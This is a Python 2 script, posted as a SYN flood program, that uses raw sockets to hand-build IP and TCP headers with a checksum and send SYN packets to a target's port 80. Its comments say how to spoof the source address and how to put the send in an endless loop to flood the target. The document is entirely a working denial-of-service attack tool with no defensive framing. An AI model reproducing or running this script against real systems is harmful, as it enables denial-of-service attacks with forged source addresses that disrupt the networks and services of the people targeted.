[Py] Syn flood program in python using raw sockets (Linux)

1. # some imports
2. import socket, sys
3. from struct import *
4.  
5. # checksum functions needed for calculation checksum
6. def checksum(msg):
7.     s = 0
8.     # loop taking 2 characters at a time
9.     for i in range(0, len(msg), 2):
10.         w = (ord(msg[i]) << 8) + (ord(msg[i+1]) )
11.         s = s + w
12.    
13.     s = (s>>16) + (s & 0xffff);
14.     #s = s + (s >> 16);
15.     #complement and mask to 4 byte short
16.     s = ~s & 0xffff
17.    
18.     return s
19.  
20. #create a raw socket
21. try:
22.     s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
23. except socket.error , msg:
24.     print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
25.     sys.exit()
26.  
27. # tell kernel not to put in headers, since we are providing it
28. s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
29.    
30. # now start constructing the packet
31. packet = '';
32.  
33. source_ip = '192.168.1.101'
34. dest_ip = '192.168.1.1' # or socket.gethostbyname('www.google.com')
35.  
36. # ip header fields
37. ihl = 5
38. version = 4
39. tos = 0
40. tot_len = 20 + 20   # python seems to correctly fill the total length, dont know how ??
41. id = 54321  #Id of this packet
42. frag_off = 0
43. ttl = 255
44. protocol = socket.IPPROTO_TCP
45. check = 10  # python seems to correctly fill the checksum
46. saddr = socket.inet_aton ( source_ip )  #Spoof the source ip address if you want to
47. daddr = socket.inet_aton ( dest_ip )
48.  
49. ihl_version = (version << 4) + ihl
50.  
51. # the ! in the pack format string means network order
52. ip_header = pack('!BBHHHBBH4s4s' , ihl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)
53.  
54. # tcp header fields
55. source = 1234   # source port
56. dest = 80   # destination port
57. seq = 0
58. ack_seq = 0
59. doff = 5    #4 bit field, size of tcp header, 5 * 4 = 20 bytes
60. #tcp flags
61. fin = 0
62. syn = 1
63. rst = 0
64. psh = 0
65. ack = 0
66. urg = 0
67. window = socket.htons (5840)    #   maximum allowed window size
68. check = 0
69. urg_ptr = 0
70.  
71. offset_res = (doff << 4) + 0
72. tcp_flags = fin + (syn << 1) + (rst << 2) + (psh <<3) + (ack << 4) + (urg << 5)
73.  
74. # the ! in the pack format string means network order
75. tcp_header = pack('!HHLLBBHHH' , source, dest, seq, ack_seq, offset_res, tcp_flags,  window, check, urg_ptr)
76.  
77. # pseudo header fields
78. source_address = socket.inet_aton( source_ip )
79. dest_address = socket.inet_aton(dest_ip)
80. placeholder = 0
81. protocol = socket.IPPROTO_TCP
82. tcp_length = len(tcp_header)
83.  
84. psh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length);
85. psh = psh + tcp_header;
86.  
87. tcp_checksum = checksum(psh)
88.  
89. # make the tcp header again and fill the correct checksum
90. tcp_header = pack('!HHLLBBHHH' , source, dest, seq, ack_seq, offset_res, tcp_flags,  window, tcp_checksum , urg_ptr)
91.  
92. # final full packet - syn packets dont have any data
93. packet = ip_header + tcp_header
94.  
95. #Send the packet finally - the port specified has no effect
96. s.sendto(packet, (dest_ip , 0 ))    # put this in a loop if you want to flood the target
97.  
98. #put the above line in a loop like while 1: if you want to flood